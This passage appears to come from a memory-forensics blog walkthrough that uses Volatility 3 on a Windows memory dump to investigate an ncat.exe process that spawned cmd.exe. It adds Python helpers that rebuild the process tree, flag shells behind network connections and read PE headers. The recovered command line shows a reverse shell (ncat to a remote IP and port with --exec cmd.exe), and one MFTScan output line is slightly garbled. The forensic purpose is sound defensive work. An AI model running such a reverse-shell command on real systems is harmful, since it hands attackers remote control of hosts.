<span style="color: white;">0xd187bc7a01b0 TCPv4 0.0.0.0 49668 0.0.0.0 0 LISTENING 1832 spoolsv.exe 2022-02-25 18:20:43.000000 </span>
<span style="color: white;">0xd187bc7a01b0 TCPv6 :: 49668 :: 0 LISTENING 1832 spoolsv.exe 2022-02-25 18:20:43.000000 </span>
<span style="color: white;">...</span>
<span style="color: white;">0xd187c1e3c4b0 UDPv4 127.0.0.1 1900 * 0 1560 svchost.exe 2022-02-25 18:22:35.000000 </span>
<span style="color: white;">0xd187c1e3d2c0 UDPv6 ::1 1900 * 0 1560 svchost.exe 2022-02-25 18:22:35.000000 </span>
</pre></div>
</div><div><br /></div><div>Focusing on the previously identified <i>PID 4260</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.pslist.PsList --pid 4260</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output</span>
<b><span style="color: #fcff01;"><span>4260 4492 ncat.exe 0xd187c1af3080 3 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled</span>
</span></b></pre></div>
</div><div><br /></div><div>Did the process with <i>PID 4260</i> spawn any other processes? Let's grep across all the processes to see if anything matches. Obviously, a better view would have been the process tree via <i>windows.pstree.PsTree</i>. However, this returned an error, so I had to find an alternate path.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.pslist.PsList | </span><b><span style="color: #fcff01;">grep 4260</span></b></span>
<span><b><span style="color: #fcff01;">4260</span></b><span style="color: white;"> 4492 </span><b><span style="color: #fcff01;">ncat.exe </span></b><span style="color: white;"> 0xd187c1af3080 3 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled</span></span>
<span><span style="color: white;">4500 </span><b><span style="color: #fcff01;">4260 cmd.exe <span> </span><span> </span></span></b><span style="color: white;">0xd187c1bc6080 2 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled</span></span>
</pre></div>
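<div>Added example, not code from the post or from the Volatility project: the Python below parses the pslist and netstat tables shown above (constructed here as inline sample rows), rebuilds the parent/child tree that the failing pstree plugin would have shown, and flags any process that owns an ESTABLISHED connection and has a shell somewhere below it, which is exactly the <i>ncat.exe</i> (4260) to <i>cmd.exe</i> (4500) chain found with grep. The SHELLS list and the function names are my own, and the parsers assume the default column layout the plugins print in this post.</div>

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Constructed sample rows, copied from the pslist and netstat tables in the post.
PSLIST_SAMPLE = """\
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output
4 0 System 0xd187b9684040 111 - N/A False 2022-02-25 18:20:37.000000 N/A Disabled
4756 4696 cmd.exe 0xd187c1cef080 4 - 1 False 2022-02-25 18:21:55.000000 N/A Disabled
4492 4756 ncat.exe 0xd187c11a5080 5 - 1 False 2022-02-25 18:22:18.000000 N/A Disabled
4260 4492 ncat.exe 0xd187c1af3080 3 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled
4500 4260 cmd.exe 0xd187c1bc6080 2 - 1 True 2022-02-25 18:22:18.000000 N/A Disabled
"""
NETSTAT_SAMPLE = """\
Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created
0xd187bff9e730 TCPv4 10.0.0.102 49671 10.0.0.110 9999 ESTABLISHED 4260 ncat.exe 2022-02-25 18:22:18.000000
0xd187b9697b50 TCPv4 0.0.0.0 5357 0.0.0.0 0 LISTENING 4 System 2022-02-25 18:20:41.000000
0xd187c1e3c4b0 UDPv4 127.0.0.1 1900 * 0 1560 svchost.exe 2022-02-25 18:22:35.000000
"""
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}  # hypothetical list of shells to flag


@dataclass
class Process:
    pid: int
    ppid: int
    name: str
    wow64: bool


@dataclass
class Connection:
    proto: str
    local: str
    remote: str
    state: str  # empty for UDP rows, which print no State column
    pid: int
    owner: str


def parse_pslist(text: str) -> Dict[int, Process]:
    """Parse the whitespace-separated rows printed by windows.pslist.PsList."""
    procs: Dict[int, Process] = {}
    for line in text.splitlines():
        f = line.split()
        if len(f) < 10 or not f[0].isdigit():
            continue  # banner, header, progress or "..." lines
        procs[int(f[0])] = Process(int(f[0]), int(f[1]), f[2], f[7] == "True")
    return procs


def parse_netstat(text: str) -> List[Connection]:
    """Parse windows.netstat.NetStat / windows.netscan.NetScan rows."""
    conns: List[Connection] = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 9 or not f[0].startswith("0x"):
            continue
        tcp = f[1].startswith("TCP")
        i = 7 if tcp else 6  # UDP rows have no State column, so PID shifts one left
        conns.append(Connection(f[1], f"{f[2]}:{f[3]}", f"{f[4]}:{f[5]}",
                                f[6] if tcp else "", int(f[i]), f[i + 1]))
    return conns


def descendants(procs: Dict[int, Process], pid: int,
                seen: Optional[Set[int]] = None) -> List[Process]:
    """Every process below pid, depth first, guarding against PPID cycles."""
    seen = {pid} if seen is None else seen
    out: List[Process] = []
    for p in sorted(procs.values(), key=lambda x: x.pid):
        if p.ppid == pid and p.pid not in seen:
            seen.add(p.pid)
            out.append(p)
            out.extend(descendants(procs, p.pid, seen))
    return out


def render_tree(procs: Dict[int, Process], root: int, depth: int = 0) -> List[str]:
    """pstree-style listing rooted at root, a stand-in for windows.pstree.PsTree."""
    p = procs[root]
    lines = [f"{'  ' * depth}{p.pid} {p.name} (ppid {p.ppid}, wow64={p.wow64})"]
    for child in sorted(procs.values(), key=lambda c: c.pid):
        if child.ppid == root and child.pid != root:
            lines.extend(render_tree(procs, child.pid, depth + 1))
    return lines


def shells_behind_connections(procs: Dict[int, Process], conns: List[Connection]) -> List[dict]:
    """Flag owners of ESTABLISHED TCP connections that have a shell below them."""
    findings: List[dict] = []
    for c in conns:
        if c.state != "ESTABLISHED" or c.pid not in procs:
            continue
        shells = [d.pid for d in descendants(procs, c.pid) if d.name.lower() in SHELLS]
        if shells:
            findings.append({"pid": c.pid, "owner": c.owner, "remote": c.remote, "shells": shells})
    return findings


if __name__ == "__main__":
    procs = parse_pslist(PSLIST_SAMPLE)
    for f in shells_behind_connections(procs, parse_netstat(NETSTAT_SAMPLE)):
        print(f"PID {f['pid']} {f['owner']} -> {f['remote']} has shell(s) below it: {f['shells']}")
    print("\n".join(render_tree(procs, 4756)))
```

To run this against a real image, pipe the plugin output into the two parsers instead of the constructed samples; the header and progress lines are skipped automatically.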
</div><div><br /></div><div><div>Looks like <i>ncat.exe</i> spawned a <i>cmd.exe</i>. Time to dig even deeper into <i>ncat.exe</i> to see what the command line looks like.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.cmdline.CmdLine --pid 4260</span></b><span style="color: white;"> </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Args</span>
<span><b><span style="color: #fcff01;">4260 ncat.exe </span></b><span style="color: #fcff01;"><b>"C:\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\</b></span><b><span style="color: #fcff01;">ncat.exe" --verbose 10.0.0.110 9999 --exec cmd.exe</span></b></span>
</pre></div>
</div><div><br /></div><div><div>Above, we see <i>ncat.exe </i>command line involved <i>cmd.exe</i>. We also see the IP address of <i>10.0.0.110</i> on port <i>9999</i>. This is good information so far.</div><div><br /></div><div>Looking at the command line for cmd.exe with <i>PID 4500</i></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.cmdline.CmdLine -</span><span style="color: #fcff01;"><b>-pid 4500</b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Args</span>
<b><span style="color: #fcff01;"><span>4500 cmd.exe cmd.exe</span>
</span></b></pre></div>
</div><div><br /></div><div>Above shows nothing as interesting as the command line for <i>ncat.exe</i>.</div><div><br /></div><div>Looking at the DLLs loaded by <i>ncat.exe</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.dlllist.DllList --pid 4260</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process <span> </span><span> </span>Base <span> </span><span> </span>Size <span> </span><span> </span>Name <span> </span><span> </span>Path <span> <span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span></span>LoadTime <span> </span><span> </span><span> </span><span> </span> File output</span>
<span style="color: white;">4260 ncat.exe 0x730000 0x1a1000 ncat.exe C:\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe 2022-02-25 18:22:18.000000 Disabled</span>
<span style="color: white;">4260 ncat.exe 0x7ffe2ab70000 0x1f5000 ntdll.dll C:\Windows\SYSTEM32\ntdll.dll 2022-02-25 18:22:18.000000 Disabled</span>
<span style="color: white;">4260 ncat.exe 0x7ffe2a810000 0x59000 <span> </span><span> </span>wow64.dll C:\Windows\System32\wow64.dll 2022-02-25 18:22:18.000000 Disabled</span>
<span style="color: white;">4260 ncat.exe 0x7ffe29950000 0x83000 <span> </span><span> </span>wow64win.dll C:\Windows\System32\wow64win.dll <span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span>2022-02-25 18:22:18.000000 Disabled</span>
<span style="color: white;">4260 ncat.exe 0x771d0000 0xa000 <span> </span><span> </span>wow64cpu.dll C:\Windows\System32\wow64cpu.dll <span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span>2022-02-25 18:22:18.000000 Disabled</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the DLLs for the <i>cmd.exe</i> process with PID 4500</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.dlllist.DllList --pid 4500</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Base Size Name Path LoadTime File output</span>
<span style="color: white;">4500 cmd.exe 0x1000000 0x5a000 cmd.exe C:\Windows\SysWOW64\cmd.exe 2022-02-25 18:22:18.000000 Disabled</span>
<span style="color: white;">4500 cmd.exe 0x7ffe2ab70000 0x1f5000 ntdll.dll C:\Windows\SYSTEM32\ntdll.dll 2022-02-25 18:22:18.000000 Disabled</span>
<span style="color: white;">4500 cmd.exe 0x7ffe2a810000 0x59000 wow64.dll C:\Windows\System32\wow64.dll 2022-02-25 18:22:18.000000 Disabled</span>
<span style="color: white;">4500 cmd.exe 0x7ffe29950000 0x83000 wow64win.dll C:\Windows\System32\wow64win.dll 2022-02-25 18:22:18.000000 Disabled</span>
<span style="color: white;">4500 cmd.exe 0x771d0000 0xa000 wow64cpu.dll C:\Windows\System32\wow64cpu.dll 2022-02-25 18:22:18.000000 Disabled</span>
</pre></div>
</div><div><br /></div><div>Looking at the loaded modules for <i>ncat.exe</i> via the <i>ldrmodules</i> plugin.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.ldrmodules.LdrModules --pid 4260</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">Pid Process Base InLoad InInit InMem MappedPath</span>
<span style="color: white;">4260 ncat.exe 0x75c20000 False False False \Windows\SysWOW64\KernelBase.dll</span>
<span style="color: white;">4260 ncat.exe 0x730000 True False True \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe</span>
<span style="color: white;">4260 ncat.exe 0x1400000 False False False \Windows\SysWOW64\winnlsres.dll</span>
<span style="color: white;">4260 ncat.exe 0x1410000 False False False \Windows\System32\en-US\winnlsres.dll.mui</span>
<span style="color: white;">4260 ncat.exe 0x73a70000 False False False \Windows\SysWOW64\apphelp.dll</span>
<span style="color: white;">4260 ncat.exe 0x10000000 False False False \Windows\SysWOW64\pcapwsp.dll</span>
<span style="color: white;">4260 ncat.exe 0x75180000 False False False \Windows\SysWOW64\kernel32.dll</span>
<span style="color: white;">4260 ncat.exe 0x745e0000 False False False \Windows\SysWOW64\cryptsp.dll</span>
<span style="color: white;">4260 ncat.exe 0x74500000 False False False \Windows\SysWOW64\mswsock.dll</span>
<span style="color: white;">4260 ncat.exe 0x73b20000 False False False \Windows\SysWOW64\cryptbase.dll</span>
<span style="color: white;">4260 ncat.exe 0x74560000 False False False \Windows\SysWOW64\rsaenh.dll</span>
<span style="color: white;">4260 ncat.exe 0x750a0000 False False False \Windows\SysWOW64\gdi32full.dll</span>
<span style="color: white;">4260 ncat.exe 0x747b0000 False False False \Windows\SysWOW64\version.dll</span>
<span style="color: white;">4260 ncat.exe 0x759d0000 False False False \Windows\SysWOW64\gdi32.dll</span>
<span style="color: white;">4260 ncat.exe 0x75830000 False False False \Windows\SysWOW64\user32.dll</span>
<span style="color: white;">4260 ncat.exe 0x75b60000 False False False \Windows\SysWOW64\msvcrt.dll</span>
<span style="color: white;">4260 ncat.exe 0x771e0000 False False False \Windows\SysWOW64\ntdll.dll</span>
<span style="color: white;">4260 ncat.exe 0x763e0000 False False False \Windows\SysWOW64\advapi32.dll</span>
<span style="color: white;">4260 ncat.exe 0x75ee0000 False False False \Windows\SysWOW64\msvcp_win.dll</span>
<span style="color: white;">4260 ncat.exe 0x75e60000 False False False \Windows\SysWOW64\sechost.dll</span>
<span style="color: white;">4260 ncat.exe 0x75e40000 False False False \Windows\SysWOW64\bcrypt.dll</span>
<span style="color: white;">4260 ncat.exe 0x762a0000 False False False \Windows\SysWOW64\imm32.dll</span>
<span style="color: white;">4260 ncat.exe 0x762d0000 False False False \Windows\SysWOW64\bcryptprimitives.dll</span>
<span style="color: white;">4260 ncat.exe 0x766e0000 False False False \Windows\SysWOW64\rpcrt4.dll</span>
<span style="color: white;">4260 ncat.exe 0x766c0000 False False False \Windows\SysWOW64\win32u.dll</span>
<span style="color: white;">4260 ncat.exe 0x76460000 False False False \Windows\SysWOW64\ucrtbase.dll</span>
<span style="color: white;">4260 ncat.exe 0x76cf0000 False False False \Windows\SysWOW64\ws2_32.dll</span>
<span style="color: white;">4260 ncat.exe 0x771d0000 True True True \Windows\System32\wow64cpu.dll</span>
<span style="color: white;">4260 ncat.exe 0x7e110000 False False False \Tools\Cmder\vendor\conemu-maximus5\ConEmu\ConEmuHk.dll</span>
<span style="color: white;">4260 ncat.exe 0x7ffe2a810000 True True True \Windows\System32\wow64.dll</span>
<span style="color: white;">4260 ncat.exe 0x7ffe29950000 True True True \Windows\System32\wow64win.dll</span>
<span style="color: white;">4260 ncat.exe 0x7ffe2ab70000 True True True \Windows\System32\ntdll.dll</span>
</pre></div>
</div><p>Nothing seems out of the ordinary above. Dumping the files associated with <i>ncat.exe</i>.</p><div><i><!--HTML generated using hilite.me--></i><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.dumpfiles.DumpFiles --pid 4260</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">Cache FileObject FileName Result</span>
<span style="color: white;">ImageSectionObject 0xd187bfc10bb0 KernelBase.dll file.0xd187bfc10bb0.0xd187bcf3a770.ImageSectionObject.KernelBase.dll.img</span>
<span style="color: white;">DataSectionObject 0xd187c14add70 ncat.exe Error dumping file</span>
<span style="color: white;">ImageSectionObject 0xd187c14add70 ncat.exe file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>With the files dumped, taking a closer look at the files.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span style="color: white;">└─$ ls | grep ncat</span>
<span style="color: white;">file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img</span>
<span style="color: white;">file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat</span>
<span style="color: white;">...</span>
</pre></div>
<br />Using the <i>file</i> command to identify the two files above.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">file file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img \</span></b></span><b><span style="color: #fcff01;">
<span>> file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat</span></span></b>
<span style="color: white;">file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img: </span><span style="color: #fcff01;"><b>PE32 executable</b></span><span style="color: white;"> (console) Intel 80386, for MS Windows</span>
<span><span style="color: white;">file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat: </span><b><span style="color: #fcff01;">PE32 executable</span></b><span style="color: white;"> (console) Intel 80386, for MS Windows</span></span>
</pre></div>
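<p>As an added example (not from the original post), here is a small Python reader that pulls the facts <i>file</i> reported above (PE32 versus PE32+, target machine, subsystem) straight from the headers of a dumped section; it runs on a constructed header stub so it works without the real ncat.exe dumps, and the file names are assumed to be passed on the command line.</p>

```python
"""Minimal PE header reader that pulls the same facts `file` reports above
(PE32 vs PE32+, target machine, subsystem) straight from a dumped section.
Added example, not part of the original post; build_stub() creates a
constructed header so the code runs without the real ncat.exe dumps."""
import struct
import sys
from pathlib import Path

# IMAGE_FILE_HEADER.Machine values (PE/COFF specification)
MACHINE = {0x014C: "Intel 80386", 0x8664: "x86-64", 0x01C4: "ARM Thumb-2", 0xAA64: "ARM64"}
# IMAGE_OPTIONAL_HEADER.Magic and .Subsystem values
OPT_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}
SUBSYSTEM = {1: "native", 2: "GUI", 3: "console"}
# Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics
COFF_HEADER = "<HHIIIHH"
IMAGE_FILE_DLL = 0x2000


def describe_pe(data: bytes) -> dict:
    """Return format/machine/subsystem for a buffer holding a PE file, or
    raise ValueError when the MZ/PE headers are missing or truncated."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    coff_off = e_lfanew + 4
    opt_off = coff_off + struct.calcsize(COFF_HEADER)
    # Dumped sections are often truncated, so bounds-check before every read
    if opt_off + 2 > len(data):
        raise ValueError("e_lfanew points past the end of the buffer")
    if data[e_lfanew:coff_off] != b"PE\x00\x00":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsections, _, _, _, opt_size, chars = struct.unpack_from(COFF_HEADER, data, coff_off)
    (magic,) = struct.unpack_from("<H", data, opt_off)
    # Subsystem sits at offset 68 of the optional header for both PE32 and PE32+
    subsystem = None
    if opt_size >= 70 and opt_off + 70 <= len(data):
        (subsystem,) = struct.unpack_from("<H", data, opt_off + 68)
    return {
        "format": OPT_MAGIC.get(magic, hex(magic)),
        "machine": MACHINE.get(machine, hex(machine)),
        "subsystem": SUBSYSTEM.get(subsystem, subsystem),
        "sections": nsections,
        "is_dll": bool(chars & IMAGE_FILE_DLL),
    }


def is_pe(data: bytes) -> bool:
    """True when describe_pe() accepts the buffer."""
    try:
        describe_pe(data)
        return True
    except ValueError:
        return False


def build_stub(machine=0x014C, magic=0x10B, subsystem=3) -> bytes:
    """Constructed header-only PE: DOS header -> PE signature -> COFF header ->
    96-byte optional header, one section claimed. Not a runnable executable."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))          # e_lfanew
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 68, subsystem)
    # Characteristics 0x0102 = EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = struct.pack(COFF_HEADER, machine, 1, 0, 0, 0, len(opt), 0x0102)
    return bytes(dos) + b"PE\x00\x00" + coff + bytes(opt)


if __name__ == "__main__":
    # Usage (paths are assumed): python pecheck.py <dumped .img> <dumped .dat>
    # With no arguments the constructed stub is described instead.
    for path in sys.argv[1:] or ["<constructed stub>"]:
        data = build_stub() if path.startswith("<") else Path(path).read_bytes()
        try:
            print(path, describe_pe(data))
        except ValueError as err:
            print(path, "not a PE:", err)
```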
</div><div><br /></div><div><div>We can see the files are being reported as a PE32 executable. Good start.</div><div><br /></div><div>A different view of file information.<br /><br /></div></div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.filescan.FileScan | grep -i ncat</span></b><span style="color: white;"> </span></span>
<span style="color: white;">0xd187c14add70.0\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe 216</span>
<span style="color: white;">0xd187c1e11be0 \ProgramData\chocolatey\bin\ncat.exe 216</span>
<span style="color: white;">0xd187c1e279e0 \Windows\Prefetch\NCAT.EXE-4B4B887F.pf 216</span>
<span style="color: white;">0xd187c1e2a280 \ProgramData\chocolatey\bin\ncat.exe 216</span>
<span style="color: white;">0xd187c1e32750 \Windows\Prefetch\NCAT.EXE-1B3976EF.pf 216</span>
<span style="color: white;">0xd187c1e34820 \ncat-0 216</span>
<span style="color: white;">0xd187c1e349b0 \ncat-0 216</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>At a minimum, we now have the path of the file, as well as a prefetch entry for it.</p><p>Looking at the MFTScan plugin.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.mftscan.MFTScan</span></b><span style="color: white;"> | grep -i ncat</span></span>
<span style="color: white;">* 0xbb0681ad38b00 FILE 104014an2ing finFiled Archive FILE_NAME 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 ncat.exe.log</span>
<span style="color: white;">* 0xbb0681ad3928 FILE 104014 2 File Archive FILE_NAME 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 NCATEX~1.LOG</span>
<span style="color: white;">...</span>
<span style="color: white;">* 0xbb0688e7c920 FILE 105970 2 File Archive FILE_NAME 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 NCAT.EXE-1B3976EF.pf</span>
<span style="color: white;">* 0xbb0688e7d8b0 FILE 105974 2 File Archive FILE_NAME 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 NCATEX~2.PF</span>
<span style="color: white;">* 0xbb0688e7d920 FILE 105974 2 File Archive FILE_NAME 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 NCAT.EXE-4B4B887F.pf</span>
</pre></div>
</div><div><br />Looking at the environment variables for the <i>ncat.exe</i> process with <i>PID 4260</i>.<br /><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp </span><b><span style="color: #fcff01;">windows.envars.Envars --pid 4260</span></b></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">Progress: 100.00 PDB scanning finished </span>
<span style="color: white;">PID Process Block Variable Value</span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 LOCALAPPDATA C:\Users\SecurityNik\AppData\Local</span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 OS Windows_NT</span>
<span style="color: white;">...</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 </span><span style="color: #fcff01;"><b>USERDOMAIN SECURITYNIK-WIN</b></span>
<span style="color: white;">4260 ncat.exe 0x14a4810 USERDOMAIN_ROAMINGPROFILE SECURITYNIK-WIN</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 </span><span style="color: #fcff01;"><b>USERNAME SecurityNik</b></span>
<span style="color: white;">4260 ncat.exe 0x14a4810 </span><span style="color: #fcff01;"><b>USERPROFILE C:\Users\SecurityNik</b></span>
<span style="color: white;">4260 ncat.exe 0x14a4810 user_aliases C:\Tools\Cmder\config\user_aliases.cmd</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 USER_BUILD windows.1</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 USER_MAJOR 2</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 USER_MINOR 34</span>
<span style="color: white;">4260 ncat.exe 0x14a4810 USER_PATCH 1</span>
